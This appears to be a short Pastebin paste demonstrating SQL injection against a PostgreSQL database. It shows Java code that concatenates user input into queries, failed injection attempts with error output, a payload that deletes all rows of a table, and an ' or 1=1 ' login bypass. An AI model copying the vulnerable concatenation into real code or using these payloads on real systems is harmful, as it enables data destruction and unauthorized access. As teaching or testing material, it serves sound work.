Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SQL injection on PostgreSQL
- String insert ="insert into userdetail(username,id,sno) values('"+username+"','"+userid+"','"+no+"')";
- Statement stmt = conn.createStatement();
- stmt.executeUpdate(insert);
- ');DELETE FROM userdetail;
- org.postgresql.util.PSQLException: ERROR: unterminat
- ed quoted string at or near "');"
- Position: 1
- ','',');DELETE FROM userdetail;
- 17:36:46,828 INFO [STDOUT] org.postgresql.util.PSQLException: ERROR: unterminat
- ed quoted string at or near "''');"
- Position: 38
- foo', '42', '42'); delete from userdetail; --
- insert into userdetail(username,id,sno) values('foo', '42', '42');
- delete from userdetail;
- -- ','21','21')
- String sql = "SELECT count(*) FROM users WHERE username = '";
- sql += username;
- sql += "' AND password = '";
- sql += pwd;
- sql += "'"
- ' or 1=1 or '' = '
- SELECT count(*) FROM users WHERE username = 'arthur'
- AND password = '' or 1=1 or ''=''
Add Comment
Please, Sign In to add comment